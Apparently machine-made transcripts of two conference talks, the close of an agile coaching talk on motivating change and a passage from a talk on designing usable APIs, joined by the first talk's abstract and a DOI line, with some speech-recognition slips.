for seven hours, pretty much continually. And I was not looking forward to that. On my own in a car, I thought I had to drive for seven hours, until I got to the car rental place and I was given this car. And then my view changed to, cool, I get to drive this for seven hours. This is about enjoying the journey as well as the destination. This is about making the doing something more enjoyable. Some of that's within our control, some of it isn't, perhaps more of it's within our control than we might think. This is an intrinsic motivator. My biggest challenge recently, any of you that have children, probably faced the same challenge, my kids don't like doing homework. This isn't a change, really. This is just something they don't really want to do. So how could I encourage, how could I coach my children to do their homework? The first thing I could do is I could, and I've done this, I've offered them an extrinsic motivator. I said, if you do your homework, you can have some sweets, or if you do your homework, you can have some TV time. A gasper's breath for the audience, there those of you who can't hear, big intake of, ooh, what are you doing there, Jeff? Really dangerous tactic, absolutely, you're absolutely right, really dangerous tactic. Because now, whenever there's something they don't want to do, they're expecting sweets, they're expecting TV time. Now my chances again is to do homework in the long term, really, really diminished. It's a short term tactic. Sometimes it can work, but often it's setting yourself up for a long term challenge. So let's take extrinsic motivators out of the way. I could talk to my six year old son about how if he does his homework, he'll do better at school. If he does better at school, he'll get into a good university. If he does get into a good university, he'll get a good degree, he'll get a good job, which means he'll get money, which means he can buy a nice house and go on holidays. I could give him an intrinsic goal to doing his homework, but that's not going to interest him. He's six, alright? He can't tie doing, reading his terrible book or doing his spellings or learning his two times table. He can't tie that to why we'll have a nice house. So intrinsic motivator, perhaps not so good either. Our biggest challenge, well, so the spellings thing, we created spelling challenges and games. We set up sort of fake TV shows for the spelling challenges. We get them story cubes for their story writing examples, little toys, little games that they can play. But the biggest one that we found recently, he just didn't like reading. Reading is really important, but he just didn't like it. He was being given some really, really dull, uninteresting books from school. And getting him to read anything at the end of the day was just painful. It was causing friction between us. We had to do it, but he didn't want to do it, and we were the bad guys that were making him do it. So what we stumbled across was these little Star Wars books. My son's mad on Star Wars. He's seen it a hundred times maybe each episode. And so these read-it-yourself Star Wars books, we bought him one of those. And what we found was for someone that didn't like reading, he was making excuses to stay up late so that he could read his book. He had it on the end of his bed, so the first thing he did when he woke up in the morning was he started reading. We're now supplying the school with books. It's a bit ridiculous, but it's an intrinsic motivator. He doesn't see it as homework anymore. He doesn't see it as a chore, he sees it as something he wants to do, and he's learning in the process. So how can we use that to summarize where we are? Praise and recognition. We can increase the benefit of making sure that we know what's in it for us. Reward is not a bad thing, an extrinsic motivator is not a bad thing. Doing something you don't want to do, and then rewarding yourself at the end of it, that's okay. And a sense of achievement along the way, that can be a good thing. Increase the probability of success by making sure that the change is unhurried. We're doing it at a sustainable pace. And reduce the cost of change by enjoying the journey. Make sure that we enjoy the process of change, as well as the result of change. Fourth need from Pringle. Responsibility. This is often, as Pringle would say, this is often, you see this in the concept of me do it, me do it. Children want to do something. Seven-year-olds want to be nine-year-olds. Nine-year-olds want to be 11-year-olds. They all want to be a little bit older than they currently are. And Pringle said there's nothing wrong with giving your opinions, and children certainly need a framework, some rules and explanation of why this framework is in place. But ultimately, you should model some good behavior and give them responsibility ahead of time, effectively. So how is this relevant? I've read my blog, my poor son is getting involved far too much in this talk. He's not old enough to realize yet, he won't be checking YouTube for a while. So this is okay. I'm not embarrassing dad yet. But he wanted to play, you know, daddy, I want to play football with you. So I can't play football at the moment. I've got some work to do. He said, what work have you got to do? So I've got to clear the garden. I hate clearing the garden, clearing up the leaves. He said, can I help? I said yes, absolutely. So now I had a helper, not a slave. I had a helper, someone who wanted to help me. And so he was saying, oh, can I use the spik, can I use the wheelbarrow, can I use the leap, can I use the rake? He reached all these tools that daddy used. He now had the opportunity to use this responsibility. And halfway through, I feel really embarrassed about this. But halfway through he said, daddy, you said you had work to do. This isn't work, it's fun. All right, this made me feel really bad, obviously, because if a six-year-old can enjoy it, why can't I enjoy it? But we do, this responsibility thing does wear off a little bit when we get older. It's really important. The fact that he enjoyed it made me enjoy it a little bit more. So there was some vicarious enjoyment of the journey along the way. I want to ask a few statements here, when I'm running out of time, around the locus of control. So I'm going to give you four statements, and in your head I just want you to work out what you think your answer to these statements is. The four possible answers you can have are strongly agree, in which case you have one point. You agree, not strongly, you get two points. Disagree, you get three points. Strongly disagree, you get four points. Okay, there's going to be four questions. Just keep a running score in your head. I'm not going to ask you what your score is. First statement, most of what happens in life is controlled by forces that we don't understand and are outside of our control. Okay, so if you strongly agree with that statement, give yourself one point. If you strongly disagree with that, you get four points. Okay, statement two. Success hinges on being in the right place at the right time. Strongly agree one point, strongly disagree four points. Keep a running total in your head. Success hinges on being in the right place at the right time. Statement three, whether I work hard or not, it won't affect how people assess my performance. Strongly agree with that one point, strongly disagree four points. Keep a running total. And the final statement, leaders are born and not made. Okay, strongly agree one point. If you have a very high score, okay, means you disagree with this statement, you have what is known as an internal locus of control. People with an internal locus of control look at a situation and think, okay, it might be difficult, but I can do something. I have control over my destiny to some degree. People with a low score here generally have what we call an external locus of control. They believe themselves to be relatively helpless. They believe themselves to be at the whim of fate and other people. People with a high external locus of control find change really, really daunting. Okay, they find it really difficult to cope with change. They find it very difficult to be proactive about change. So what I'm saying here is, could we as coaches find a way to help increase people's internal locus of control? Given the time, I'm going to have to just skip this next video. Developing an internal locus of control, taking ownership of our situation, taking control of our destiny, is a tool to increase the likelihood of change, and it's also a benefit to ourselves. We like being in control of our destiny, generally speaking. So what can we do about that? Well, again, a study, going back, this is not going back very long, it's only about five years ago, this study, someone I've already mentioned, Gildini. He studied people not turning up to doctor's appointments in the NHS in the UK. He found that by just changing one practice, you could reduce the number of people who didn't turn up by 18%. That one change was that the patient wrote down their appointment time, rather than the receptionist writing it down for them. So rather than the receptionist writing down, your appointment is on this time of the day, the patient wrote down, my appointment is on this day. It seems like a very simple change to make to have such a big impact, but it's very related to another study. I was unsure as to whether you guys actually have the same Halloween concept that we do in the UK, but apparently you do, we've exported it. So this idea of trick or treating, children coming round, knocking on the door, and you're giving them some sweets so they don't smash your car windows or something like that. There's a study done around Halloween, so they set up this house with a bowl of sweets outside, with a note that says, sorry we've gone out, but please take a sweet from the bowl. What do you think happened? Yeah, they took loads. Children just filled their pockets. Brilliant, no one's in. Loads of sweets, loads of chocolates. Off we go. Same setup, same house, same bowl, same sweets, same notes, sorry same note. One difference, behind the bowl was a mirror. Just a mirror. What happened then? They only took one. Why? Because they looked in the mirror and they didn't see, looking back at them, a thief. They didn't see themselves as a thief, and because they actually had to see themselves, they didn't steal. So how's this relevant? You as a coach can help be the mirror. By playing back what you see, by playing back what you hear, to them, holding it up to them, they can then assess their own behaviours, their own attitudes, their own responses. And by doing it in small chunks, just make some decision. Show to yourself that can have a positive impact on your own situation, and regularly make improvements in that regard. Get into the habit of increasing your internal locus of control, and regularly holding the mirror up as a coach. Filling up our matrix here, increase the benefit by helping people and encouraging people to take greater control of their destiny, internalising their locus of control, increasing the probability by being the mirror. I'm not going to talk about non-directive language here, but basically trying not to answer and solve their problems for them. So asking questions rather than answering questions as a coach. And then reduce the cost by increasing the sense of responsibility. So I want to wrap up. One more model I want to give you before we finish. And that is around the fact that change is hard. We know it's hard, we know it's scary. People will change if you can help get their change equation positive. It's got to be positive. Meeting those four needs that Pringle identified, or at least our analysed versions of them, will make it easier. Coaching can influence the change equation. So by taking a coaching approach, this non-directive approach, this supportive and nurturing approach, and then by having belief. So this is the final model that I want to leave you with, and this is effectively my default coaching approach as a coach. So having belief. Obviously it's an acronym, so the B stands for believing in the potential of the person you're coaching. Believing that anything is possible unless you've been proven otherwise. Taking advantage of the Pygmalian effect. B stands for inquiring. Inquire where they are, where they think they are, where they want to be, and why that would be valuable to them. Make sure they're aware of why it's valuable. So always asking, helping sure they own this change. It's got to be valuable to them. Listen to what is being said, what's not being said, and how it's being said. And play it back to them. Illuminate what you're hearing, what you're seeing. Be the mirror. Encourage small, even if it's really, really small. Experiments, changes, progress, forward motion. Get them into the habit of making a decision, seeing some results from it, building on it. And being there for them while they do that. And then helping to facilitate their, it sounds rather dramatic, facilitate their journey through this change process. Because it's going to be a long road, and you need to be adaptable. You need to be agile in your approach here. Or you might just want to sit, and just let them rant. Just let them get off their chest, what's bothering them. One day you might want to ask some really powerful questions. Or offer some observations, or offer some information, or perhaps play a little video, and say, how's that relevant? So you need to be adaptable and have a flexible toolkit so that you can help people along their journey. So if you have belief in people, and you can use this model, you're more likely to help people, help themselves. So that's my talk, I have three minutes left for questions. Anybody got a question? Questions? No? Fantastic. Me personally? Okay, so what situations have I used these techniques? So I use these techniques in various ways. I'm a scrum coach, and I'm also a professional coach as well. So I coach people in the agile space, and I also coach people completely nothing to do with agile. So I'll be coaching teams adopting scrum. I'll be coaching scrummasters who are trying to become better at their job. I coach product owners trying to become better at their job. Coaching leaders trying to roll out agile within their organizations. But also people who are looking to make a career change. Who are looking to move jobs, who are looking to get a promotion. These kinds of things. As well as at a personal level coaching people in terms of their own outside of work if you like. And to some degree coaching myself in my desire to not get considerably unfit and overweight. With moderate success. Okay, thank you. Any other questions? Thank you. The great well-known Australian philosopher Kylie Minogue. She once said, it's better the devil you know. So I'd rather stick with something that isn't brilliant, but I know it. Than move to something that I might be better, but might not. I don't want to take that risk. Okay, yes? Sorry again? Did you eat a second chocolate? I haven't yet. But there's always the chance because I will need to walk down there again. So maybe you could be the mirror for me. If you see me reaching for a chocolate. Yeah. Okay. Well, thank you very much for turning out. And certainly thank you very much for joining in. Asking some questions along the way. I hope it's been useful for you. Enjoy the rest of the conference. EÏþU
|
Change is hard. Coaching for change is hard. How do you help generate some inertia for people to begin a change? Why do people sometimes choose to change and sometimes not? How can you increase the chances of people changing and how can you be an effective coach for people who want to change? And then, how do you know you are being effective as a coach? This session will introduce the concept of a "change equation" that I believe everyone weighs up when considering (even subconsciously) whether to make a change or not. I will then share my model of having BELIEF in your team, or the person you are coaching, to increase your chances of success and then finally a METRIC model for evaluating the effectiveness of coaching for change. This talk makes use of Mia Kellmer Pringle's book "The Needs of Children" which outlines 4 basic needs that children have and how, by applying these to my work as a coach it has increased my efficacy and thus the mobility of my clients.
|
10.5446/51420 (DOI)
|
Okay, can you hear me? It's like I don't have any answer, so I suppose nobody hears me. Okay. So writing usable APIs in practice. Now I have to tell you that if you have Googled about this, there are some other versions, of this talk I gave at other conferences, however, they are not identical. I always modify the material a bit, update stuff a bit, and generally speaking, I update it with the stuff that at that point in time annoys me the most. Okay. Basically, my talks are born out of frustration of what I see in my daily job. I work as a freelance consultant and contractor, and I write code. And I land on legacy code bases where some interesting decisions were taken. Okay. As far as APIs go, in this case, now we'll see it, but this talk is not only about APIs as when you download, I don't know, Spring API or Hibernator or something like this, but it's also about the stuff you do at work. Your internal project, if you actually are careful and disciplined in the factoring your code, you'll end up with plenty of packages or libraries or the things that represent some sort of APIs, subsystems you use in the rest of the system. Okay. So the idea is that I'll talk about things that are relevant both for the public, if you publish APIs for third parties or use them in your own internal projects. Okay. I want to start with the definition first. In this case, when I'm talking about APIs, I'm not talking about the Amazon APIs or stuff like this, but it's more like, and we'll be using this definition, any well-defined interface that defines the service that one component, module or application provides to other software elements. As a practical example, Java IO package, Java 7, this is, this provides an API. Okay. I use it as an example because then I have a running example with this thing. So basically, this is all the interfaces, classes, the exceptions are part of the API, the errors, but also you don't see them here, but also the public methods, stuff that the users of this package use are part of the API in this context. Okay. By the way, if at any point in time you have questions, observations, and stuff like this, please raise your hand. And then talk about usability. So what is usability about in this context? It's about efficiency. Something is usable for if it allows you to be productive in what you do. You want to do something without wasting time. It's about effectiveness. So we want to be able to actually solve the problem you are trying to solve in a proper way. It's about error prevention. A good software API, a well-written one, will help you to avoid some stupid mistakes. And this is also about ease of learning. How many of you have come across APIs that actually you can guess what method to call in which class, stuff like this, or the order of parameters? I've seen some very, very few. But it's about this. It's like the ease of learning is about the fact that you can navigate it in simple ways without too much effort. And then since I've seen Uncle Bob with questions, yesterday I saw Jeff Watts with the questions. I said, okay, I want my own question in my talk now. I'm jealous. There it is. This is a usability question. This is the big O notation. So it means that the upper bound for this is one on B. I don't know exactly which kind of function is. But that's an upper bound. And B is the brain power necessary to achieve your goals. Sorry, I thought I deleted this one. The question is made up in totally arbitrary. I was just jealous on my side for the other guys. But the serious message is that actually if you think as a rule of thumb that you don't want to overload the brain of people doing their work. Why do we want to bother with this ability anyway? Is from a company perspective actually, APIs can be quite a great asset, but also a huge liability. For example, I work a lot with investment banks. And typically I work on the big systems they use in the back end, pricing, risk in this kind of stuff. And they use the APIs written by the quant that are the mathematicians that come up with their own algorithms to calculate risk or price of an auction or some other things. And those APIs are actually company secret. To see them, to be allowed to see them as a developer, here to a special organization, most of the time. Because the algorithms are secret. So they are actually one of the main assets of the company. The problem is that usually there are also huge liabilities. Let's say, as Kevlin would say, the code is usually written in good ways. Is often written badly with memory leaks, is a mess, difficult to change, not tests. Many wonder why you have problems in the markets, but really sometimes some important functions have no automated tests whatsoever around those. And so when they want to implement new models or change something in the technology, they may have huge problems. So a project, for example, to go from, I work in a bank that was a project to go from Visual C++6 to, I think, Visual 2008, probably, took ages, can take years, simply because the code was written in horrible ways. Live alone, the visual C++6 is not really C++ in many ways, but it was mostly because of the way the things were written. But also there is the other perspective, it is how many of you here are programmers, write code every day, so most of them. Any managers, architects? Out. So from a programmer's perspective, having an API that is actually usable means that they have fewer bugs to take care of. Since, for example, I can guess how to use the classes and the methods and the data, it's easier for me to write code that makes sense. Of course, my code, as a consequence, will have higher quality, which will be so easy to maintain. And I'll be also more productive. It'll do what I'm supposed to do in less time. Really, a few days ago, I was working with a C API to do the tenet using some C++ code. I actually spent two days to understand how a particular bit of functionality worked to achieve my goals. Because of the patterns they followed, inviting it because of the documentation around it, but you see two days. So let's say that I didn't really feel very productive. So I had an impact, and I worked as a contractor, and I'm paid by the day, which means has an impact of my customers as well. And also, here I distinguish between two types of APIs, just as I mentioned before. So there are the public APIs, the ones that are given to third parties. You may work for a company that produces some libraries or packages to give outside, or the typical open source software that we download and the libraries we use. The private ones, in this case, are the ones for internal users. As I said before, if you refactor your application, modularize it properly, you'll end up with many several APIs to achieve different goals in the different parts of your application. As we see, there is one main difference between these two that is basically the private ones. You can do whatever you like with them. They are internal of your project, so if you make a mess, you will make a cause and mistake. You have a bad decision, you can always change it. With the public ones, you can't. Or, well, better, you can, but with great, great effort, because they are used by other people, other teams, and sometimes they even rely on your bugs. So in fact, I claim that any non-trivial software application involves writing one or more APIs. And also, I think that when we talk about good code, you know, as developers, what we mean in a way is also code that is usable from a developer's perspective. When you read a good fragment of code, it's like you think it's good because you know what you can do with it. You know how you can possibly modify it, you understand what it does. So it's usable from a programmer's perspective. Any questions so far? Okay. Now, I will introduce some concepts, usability concepts. The idea here is that I want to give you some information that you might not have come across, but I hope it will be useful for your work today, you know, to help you think in slightly different ways when you write some classes, packages, functions. After these, I'll talk also about some simple techniques you can use directly. You know, go back to work, you can do that. The simple techniques are chosen not because they are the only ones, it's just a small subset and these are things that are, as we see later, actually not difficult at all. Somehow we always forget about that stuff. All the code I see keeps having the same issues. So first concept, affordances. An affordance is a quality of an object or an environment that allows an individual to perform an action. A door affords opening and closing. This thing has a laser pointer, you can see it very well, but affords pointing. We can apply exactly the same concept to APIs. Let's think this is Java 4 reading a file line by line. Was kind of interesting. You can see that the affordance is there. You can read the file line by line. But also you can also see that sometimes the affordance is not that visible. It's not immediate. So if you had like media experience at that time of like, I need to do this, how do I do that? Then the first point of call is let's look at the class file. Nothing in there to help you. And then start to read all the classes and methods in the Java U and at some point you arrive at this thing. So the affordances there may not be that visible. The second point is that part of the affordances are also the errors. What can you do in case of errors? What does the API tell you? Something happens, what can you do about that? So the exceptions are part of their own affordances as well. And as you can see this example, there is plenty of stuff going on just to read the file line by line processing. This is an example with Java 7. They introduced a new package. Still doing the same thing. Here is a bit clearer in the code what you can do. Come out because there is a concept of file path. There is a concept of char set which you may or may not care about. Sometimes we just want to read the file line by line like this. And then there is something, this read all lines method. Still there are some things like files is a static class as a similar name to the other one but then I'll talk about this a bit more in that later on. And somebody that looked at one version of this talk on InfoQ actually criticized me for saying, well, the example with the file is not relevant. You should have used the Java class, Java Util Scanner. Admittedly this code is cleaner than the first example. Fewer things going on. But if you have a few minutes of patience, I will explain why I don't think it's still a good API kind of thing. This is what you do in Python. Which I put this because what you do in Python or Ruby, this kind of languages is usually kind of obvious. This is why the duck typing languages have the property that usually somehow are written in a way that the obvious stuff you want to do the 80% of the time is just easy to find. And then there are some cognitive dimensions. By the way, I put at the end of the slides, I'll make them available. Somehow there are references, books and link references also. Here you see where I put the material as well in terms of things. So you can check the sources. So the first one is the abstraction level. Minimum and maximum levels of abstraction exposed by the API. Think about the file example. We see it again. The first example, there was the concept of file, but then there was the concept of reader and buffer reader and things that are actually at different level of abstraction in that context. Working framework. How much stuff have you got to know to be able to achieve your goal? How many classes, methods, packages, how many of these things are involved? Progressive evaluation. To what extent you can execute partially completed code? How many of you, when you try some new library, you want to achieve something, how many of you actually copy and paste some example code and then start tweaking it and maybe removing some and start to execute bit by bit and add more? How many of you do that? So an API that is amenable to this, that you can do that, allows you some progressive evaluation, basically helps you in understanding how it works. And penetrability, that is the extent to which you must understand the underlying implementation details. For example, things like sorting lists. For that one, it's very important to understand if the implementation is N log N or N square or whatever else. You can't see it from the surface, from reading the API. You have to understand, in a way, it's internal. Somebody has to tell you, but in a way, it's internal if you don't know. Or is it thread safe or not? Sometimes people don't tell you these things, but maybe you need to know that because the context in which you are using it, if it is not thread safe, you may have a problem. And then you don't know if it is thread safe and to be sure you have the log around it and then maybe you discover that it was thread safe and you have plenty of far too many logs and you start to have other kind of things. So how much you need to know about the details so you can be effective in using it. And then consistency, how much can you infer of the API once you know part of it? And here is the realm of naming conventions or the central decor patterns of your design of the API. It's the kind of the map of the system. How easy it is for people to actually understand it. Let's look at the examples again with the cognitive dimensions on the side so we have a reference point. So abstraction level, in this example, there is quite a lot of stuff going on because I want to read the file line by line. For me, the concept here is that I have a file and it has got lines. But here you have to know about file readers, buffered readers. And stuff like this. It's like there is more than abstraction level. There are many things, different levels you have to know to be effective with it. If I'm not clear, raise your hand and ask questions. Then think about the working framework. Again, you need to know about several classes and exceptions and things. Progressive evaluation, well, in a way it allows you to that because you can always create a reader and file reader and compose them one at a time and get there. So yeah, there is some. Penetrability, well, in this case, it's like you don't really need to know much of the internals. So it's okay. But at least it's all public stuff in this package. We are not thinking about any trading issues here or stuff like this. So kind of okay. Consistency, well, I'd say that Java is consistent in making your life difficult sometimes. So in a way, it's consistent to an extent. But let's look also here. This is an interesting point that will come up in a minute. So everything is in the same package. So I'm looking just at one of the Java IO API. I think, yeah. I need to just browsing that package. I'm able to do this. The example with Java 7. So this is a different one here. The abstraction level is actually much better because I've got the concept, well, of file and file system path and chart set that is, well, depending on what you read is probably interesting, even if probably most of the time you will end up with the default chart set anyway. So the abstraction level from this point of view is much better. Working framework, again, doesn't really require to know. A lot is fine. Progressive evaluation, you can do that. Penetrability, just like before. Consistency, again, same Java stuff. However, and also everything comes from the same package. So if you know about this package, you can browse it. But now I want to attract the rotation to one thing. This thing is in addition to the Java IO package. So basically now in Java 7, you have different ways of achieving the same goal using different subsystems, different APIs, which have things with similar names. I actually checked the files class. There's also some methods that are like the file class on the other one, except the file is not static. Files is mostly static methods. The other is not. So it's kind of, if you know about both, you may end up actually being confused. So living in the same system, these things actually may make your life not easier. And then the example with the scanner. The code is cleaner, I agree on that. And probably it's abstraction level. You have this concept of scanner. Scanner of what? What does a scanner scan? You can scan many things in many ways. What does it mean? And then if you look also, the scanner does basically scan stacks to give you some and chops it in various ways. But then also the scanner takes a file. So it's kind of odd. I don't think the abstraction level is quite much up. The code is cleaner. But look at this. It's two packages, two different ones. So you have to know about the Java.io file and the Java.util scanner. Live along the file that calling something utility is always a bit, you know, it's like the article. You don't know where to put stuff. You put it in utility. So the guy that criticized me on the web was like, you just said to use the scanner, your example is not relevant. Well, you know, the example was not about writing the code test. It was about talking the usability of the APIs here. So I maintain that even if the code here is cleaner, actually, it's not more usable. I would contend that actually using the first example is probably easier for you to find. Because you have to browse one place that is the obvious one, deals with files, yeah, and then you end up digging there. But it never comes to my mind. I say, ah, it's not here. Let's look at util. And then of course, the same example with the Python just to hear the abstraction level is exactly what you want, basically. You have a file, you have your lines, working framework requires one class and the red lines method on the class, which is pretty obvious. And progressive evaluation is pretty easy. Actually with Python, it's interesting. The first time I used it, I needed to solve a problem at work. So, but I didn't know the language at all. I got a Python in a nutshell book on the weekend, but basically ended up on the Monday having production ready code. But most of the code I wrote, I could kind of guess. You know, it's like, well, this class can be. And that was an interesting experiment because basically you can see that the APIs there are written in a way that address the 80% case. Yeah. Maybe they are not just as flexible and the Java, but I don't care. You know, most of the time you don't care about these things. Any questions so far? Okay. Now some techniques. As I said, these are techniques that are not new. It's nothing I've invented. It's nothing I've shatting or anything with this. But it's something that I see. I see again and again the same problems. Yeah. Basically, to actually improve our code, sometimes we just need a bit of attention and just apply very simple techniques that we all should know. Yeah. And I like this quote from Alan Perlis about this. You know, none of the ideas presented here are new. They are just forgotten from time to time. It just describes my feelings about these kind of things. So I talk about things like user perspective, naming, explicit context, error reporting, and also incremental design. For who in this room these things are completely unknowns, you cannot even guess what this stuff is. Yeah. So as you can see, it's nothing particularly new. But first thing, we developers are in the habit of doing our own stuff. Then somebody cannot use our code, our APIs, comes to us and we say, oh, how is it possible? Look, it's simple. You just do da, da, da, da, da, da, da, da. Yeah. It's obvious. The problem is that you really need to ask what would the user do? Yeah. And you are not the user. You are not the user. You are not the user. Okay. So you really need to do something to make sure that whatever you are doing makes sense to the user. First thing, these should be trivial. Yeah. Use language constructs to make intent clear. Make TV. If you read something like this on the code, you say, well, maybe you know that this code is about some TV-related stuff, television, that stuff. Yeah, it's creating a TV instance. What the hell is true and false? Yeah. I see code like this all the time. Then you go and dig into the implementation and you say, ah, it's color and then I guess it's color. The other one must be black and white and then it's safety or flat screen or something like this. Yeah. What if we had just an enum? As I say, this, how many of you have never seen code with a Boolean like this? How many of you always write code in ways similar to this? Okay. Well, I include the, you know, I'm just like you. It's not that I'm perfect. Just to be clear. And then you can end up with this. So basically, if the API for making TV had exposed this kind of enum, also this ability would be much, much easier because from the person having to call them, it would be much easier to guess what to do. And also reading the code, so now understand what it does. But sometimes when we develop our own stuff, we lose focus on this perspective because we are too engrossed into the ideas we have in our heads. Yeah. And forget about these aspects because after all, if you are doing it, we are the experts. Yeah. So we are not too tough with the complexity. And with the code I'm dealing with right now, it's even worse because I don't have Boolean. I don't have Boolean. I have int and hash define instead of constants, you know, to define the various ints, which is even worse because you look at the, you know, Boolean at least has two values, so it's like, OK. But then an int, you know, times 32 or something values, which ones are actually allowed and which are not? Yeah. Questions so far? These other things give control to the code. Now who can answer this? What's wrong with this? Have a look at the code and tell me. By the way, this comes from real production code I've seen. OK. So I didn't make it up. So if you find it strange, it's not because I wanted to be, you know, to make a point. It just comes from real production code. Maybe we need to tell me what's wrong with this. OK. Let's have a look. The first one is startable. So as a metal start, that returns a startable. But if you call the start again, we'll throw an exception saying, oh, it is already started. Sorry. Yeah. So if you, in your code, if you come up with a startable, you can start it, but then it's like, you can't do much about it. Then there is the stopable one that does work basically the same pattern. It turns to a stopable. But if it is already stopped, you cannot stop it. So users of this API are actually forced. Well, first of all, it's obvious that these things go together. So they are actually forced if they get a startable to downcast to a stopable. So basically they have to know an implementation detail to be able to do something with their own active object. Yeah. Is it clear? You get a startable somewhere, you start it, but at some point you need to stop it. You know that, you know, has to be a stopable, so you have to cast it to the stopable things. These kind of things can make your code incredibly brittle because then you change something, the casts don't work anymore, you have all sorts of problems. This had been written by someone that a very interesting idea about single responsibility principle. After a while we reflected the whole thing to this, which was, you know, is a service has a start, has a stop, and you know if it is started or not. So you know what to do with it. But this kind of code actually happens again. I see this again and again of variations on the team. It's like you provide an API, but then to do something you have to downcast and have to know the implementation class underneath. You have the interface, but you have to know the implementation, downcast it to do something interesting to you. As I said, these are very simple things to do. Unfortunately code like this is still out there. Who does TDD in this room? At least write unit testing even if not TDD. The same people. A few more. Now if you actually write your API using TDD, put it in the shoes of a user. Because if you write the test first, they think you don't want to be in your test. It's like I need to read the file line by line, but of course now let's start with a file reader, then a buffer reader, blah, blah, blah, blah, blah, blah. At the end you have the file. If you use TDD, usually you tend to say, you know what, I want to have a file in which I can read lines. Because in that point in time you become the user and these kind of tedious to do the long winded way. And also helps you because it helps you with outside in development. Usually you look at what you are trying to achieve exactly from the user perspective first, not from the internals, not from the other side. If writing a test is painful, the design may be wrong. Now this is an important thing because I work with teams that use TDD and they couldn't read their tests. So they were confused by their tests. So that was a very strong sign that something was wrong somewhere. And this is something that is very easy to spot because you see as soon as you get confused something is wrong. And that is actually a strong signal that maybe you should change something in your design. Not only this, the test will provide up to the documentation and examples of use. How many of you, before using a new API, the very first thing to do is less download the PDF manual and read about it? One. That's the first one. How many of you, instead, download snippets of code, copy, paste, try to compile and see what it does? If you use TDD, providing the tests actually also to the user, this provides the examples of use. The snippets of code to get them started. And of course, with TDD helps with various things, the abstraction level. As I said, it helps you to limit the number of abstractions in the mainline scenario simply because you're writing the test first, you probably are lazy, just like I am, and you don't want to write a blot of stuff just to get to the main point. The tendency is to get to the main point first and then work around it. Helps keep the working framework smaller pretty much for the same reason. You don't want to instantiate a zillion classes or dependencies first. And in fact, if you have to mock, to instantiate 50 mocks before actually being able to test your class, your design might be slightly wrong. Helps with the progressive evaluation as well, because the tests themselves are written in a progressive way. So somehow naturally, your code follows the same kind of pattern. Provides examples on how the components interact with each other. So helps with the penetrability as well. So people can see there in the test that passing what they can do. And consistency, if you are doing TDD properly, you refactor. I don't know how many of you were there and talked this morning about TDD, what went wrong. The refactoring bit is always the bit that everybody seems to forget. Well, he mentioned that. And this will help you to actually maintain that consistency as well, because if you refactor, you'll end up actually taking care of these things. So if you think about the first example, reading a file, probably if it was like if the read line was considered an important function there in Java and was developed TDD, this is an hypothesis. A potential test would have been something like this. You get some expected lines. You instantiate the file read lines and check that they are exactly what you expect. So probably you would end up with code more similar to this. I pretty sure you wouldn't end up with this thing. Yeah? Anybody thinking that I'm talking rubbish here? Questions? OK. Naming. We talk always about naming. We have also big heated conversations usually in the team about these things. But the rules are actually simple rules, not necessarily simple to implement. So first one is reserve the simplest and most intuitive names for the entities using the most common scenarios. Yeah? So if the scenarios that are the main line was, reserve the best names for those things. Pick one word per concept. This particular point is advanced stuff in investment banking. I've seen applications where in the same application, the same concept was called trade, deal, contract and transaction. The same code base. OK. So this seems to be an easy thing to do. Well it's easy to say but requires some discipline. Yeah? And use easy to remember conventions. So with the maybe get set is not a great convention. But for example in Java is an important one simply because also some libraries rely on it anyway. Yeah? So you can use that or whatever it is you choose, make sure you follow it. So this will help people to guess. The names will make the API actually easier and more consistent. Yeah? I've done this in several projects and it's actually, you know, a bit hard to do at the beginning but then if the conventions are clear and not complicated, you know, without need picking on tiny details, just you need a few simple ones, you'll end up with a much, much better thing at the end. Don't be cute. Don't use funny names. Don't be funny. Don't do like one guy, I work in a code base, he wrote things like there was something to make a difference between transaction, banking transactions and he called transaction if guru. That's not fun. That's a problem because if I'm new to the project, yeah, I look for something for the difference and then I read guru is like what the heck is this thing? Yeah? And this is an example of not to do taken from Java again. I'm not trying to pick on Java. It's just that it's full of good examples for this kind of talks. Now something called Java your object string constants. Obviously, it's obvious what it does, yeah? And also is some documentation. This is a common constants written into the object serialization stream. Anybody can guess what this thing does? Then I got inside, say, ah, satikint and then it is beautiful also that the constants have the comments like base, wire handle, first wire handle to be assigned. Protocol version one, a string protocol version. What the hell is going on here? Then if you think about it actually, this is a kind of DSL for the serialization. They use these constants to mark various points in the serialization stream. So it's actually DSL, yeah? It's not expressed with constants but it's a DSL, but the naming of the class, it tells you this is implemented using constants. It's not telling you what it does, what it's supposed to do. And the comments here, they just is the kind of comments that is basically copy the code, paste the code and put spaces in between the uppercase thing. But this is a very common thing. I see again and again. Explicit context, what I mean with this? So we have some assumptions when you produce an API. We have assumptions about the external environment, yeah? And also there are some kind of context when interested in it. There is a deployment context, yeah, and the runtime one. So assumptions about the external environment is also things about who controls the application, things like this. Typically if you have GUI APIs, they want, often they want the main thread, they own the main thread, main loop, stuff like this. And also the context of deployment runtime, the deployment one, dependencies on other APIs, which version should you have of this other thing for this one to work? Dependence on deployment part. Sometimes you can deploy some things only some parts of your system for whatever reason, yeah? Or I work with APIs that I think with user permissions, licensing things or stuff like this. So things you have to keep in mind and have to be very clear, yeah? Example of interesting deployment context in a bank, I was working in a system that used an internally developed login framework. Well, the login framework was in the application, so I joined the team, something was not quite working and then I said, okay, look at the logs. I couldn't see any logs. After a couple of hours of confusion because I knew that the application was going through those parts, I asked a colleague and said, oh yeah, I forgot to tell you, you know, it depends on this setting on the Windows registry file. If you don't set this in the registry, you can't actually, it won't log anything in your application, okay, I use some colorful Italian expressions at that point. This is an assumption on the deployment context and was not even made public, yeah? Besides what you may think or not about this kind of choices, yeah, I don't have a positive opinion on this, but still, yeah, was an important one. And then there is the runtime context, initialization and finalization steps. Depending on the API, sometimes you need some method called at the beginning, initialize and finalize at the end. I don't know, maybe if you have, for example, middleware, typically if you have used Core, Binder, PaaST or ISO, some middleware systems, sometimes you have to initialize the thing that will connect you to the external world, yeah? Stuff like this in the main. Preconditions for calling methods or functions or instantiating classes, yeah? How can I use this? As a user of the API, what am I supposed to do to be able to use the functionality, yeah? Assumptions about global application state, this is my preferred one. Because the global state, now, global is not actually cool anymore. In recent years, we haven't done with global, you know, we have done with global, no more global, we use singletons. Two things that a singleton is not a global variable. Because my description of a singleton is that it's a global variable with a raincoated and dark glasses, yeah? Trying to look inconspicuous, you know, and I noticed. The thing is that if you have global state in your API, you can actually cause trouble to the users. Because, sorry, they can be very difficult to use in a concurrent environment, yeah? If you went to the closure talks and things, they might, I wasn't there, but they might mention these kind of things, yeah? The functional languages are big on this. You don't want any global stuff. Not even global, not even changing stuff most of the time, so even stronger than that. They can make test setup extremely 